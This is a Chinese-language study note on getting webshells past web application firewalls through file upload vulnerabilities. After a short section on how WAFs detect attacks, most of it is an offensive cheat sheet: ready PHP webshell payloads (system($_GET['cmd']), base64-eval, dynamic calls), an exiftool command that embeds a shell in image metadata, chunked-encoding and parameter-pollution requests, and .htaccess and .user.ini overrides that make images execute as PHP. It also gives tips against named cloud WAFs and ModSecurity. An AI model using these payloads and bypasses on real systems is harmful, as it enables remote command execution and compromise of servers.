文件上传漏洞绕过WAF
文件上传漏洞绕过WAF学习笔记
1. WAF检测原理
WAF(Web应用防火墙)通过以下方式拦截文件上传攻击:
-
关键字匹配:检测文件名、内容中的敏感词(如
<?php、eval)。 -
扩展名黑名单:拦截
.php、.jsp等危险扩展名。 -
文件头验证:检查文件魔数(如
FFD8FF对应JPEG)。 -
流量特征分析:检测异常请求结构(如超长文件名、畸形HTTP包)。
2. 通用绕过技术
2.1 解析差异利用
-
大小写混合:
sHell.PhP、.Php(部分WAF未统一大小写)。 -
特殊字符插入:
-
分号截断(IIS):
shell.asp;.jpg→ 解析为.asp。 -
换行符插入:
filename="shell.p\nhp"(绕过正则匹配)。
-
-
扩展名混淆:
-
多重扩展名:
shell.php.jpg→ 结合解析漏洞(如Apache解析最后有效扩展名)。 -
非标准扩展名:
.php7、.phtml、.phar(需环境支持)。
-
2.2 编码混淆
-
URL编码:
-
shell.%70hp(%70=p)→ 部分WAF不解码检测。
-
-
Unicode编码:
-
shell.\u0070hp→ 转换为shell.php。
-
-
HTML实体编码:
-
文件名:
shell.#112;hp(#112;=p)。
-
-
Base64/Hex编码文件内容:
php
<?= eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
2.3 分块传输(Chunked Encoding)
-
绕过原理:WAF可能不解析分块传输的文件内容。
-
示例:
http
POST /upload HTTP/1.1 Transfer-Encoding: chunked 7\r\n <?php \r\n 8\r\n system($_GET['cmd']);\r\n 0\r\n
-
工具:Burp Suite的
Chunked Coding Converter插件。
2.4 文件内容绕过
-
图片马注入:
-
在图片元数据中插入代码(Exif注释、IPTC字段)。
bash
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
-
-
短标签与动态调用:
php
<?= `$_GET[0]`?> # 短标签 <?php $_GET['a']($_GET['b']); ?> # 动态函数调用
-
代码碎片化:
php
<?php $a = "syste"; $b = "m"; $a.$b("id"); ?>
2.5 HTTP协议特性利用
-
参数污染:
http
POST /upload?filename=shell.jpg HTTP/1.1 Content-Disposition: form-data; name="file"; filename="shell.php"
-
部分WAF优先取URL参数中的文件名。
-
-
多文件上传绕过:
-
在多个文件字段中插入恶意文件,WAF可能只检测第一个。
-
3. 针对特定WAF的绕过
3.1 云WAF(如Cloudflare、阿里云)
-
缓存污染攻击:
-
上传合法文件触发缓存,再覆盖为恶意文件。
-
-
IP轮询绕过:
-
通过大量不同IP上传,绕过频率限制。
-
3.2 ModSecurity规则绕过
-
已知规则缺陷:
-
使用非常规扩展名:
.php%20(空格)、.php.(末尾点)。 -
利用正则回溯限制:构造超长文件名耗尽WAF计算资源。
-
4. 高级技巧
4.1 .htaccess/.user.ini覆盖
-
.htaccess(Apache):
复制
AddType application/x-httpd-php .jpg
-
.user.ini(PHP):
复制
auto_prepend_file=shell.jpg
4.2 分片上传绕过
-
上传文件分片后合并,绕过WAF对完整文件的检测。
4.3 0day漏洞利用
-
CVE-2023-XXXX:特定WAF未修复的解析漏洞(需持续跟踪)。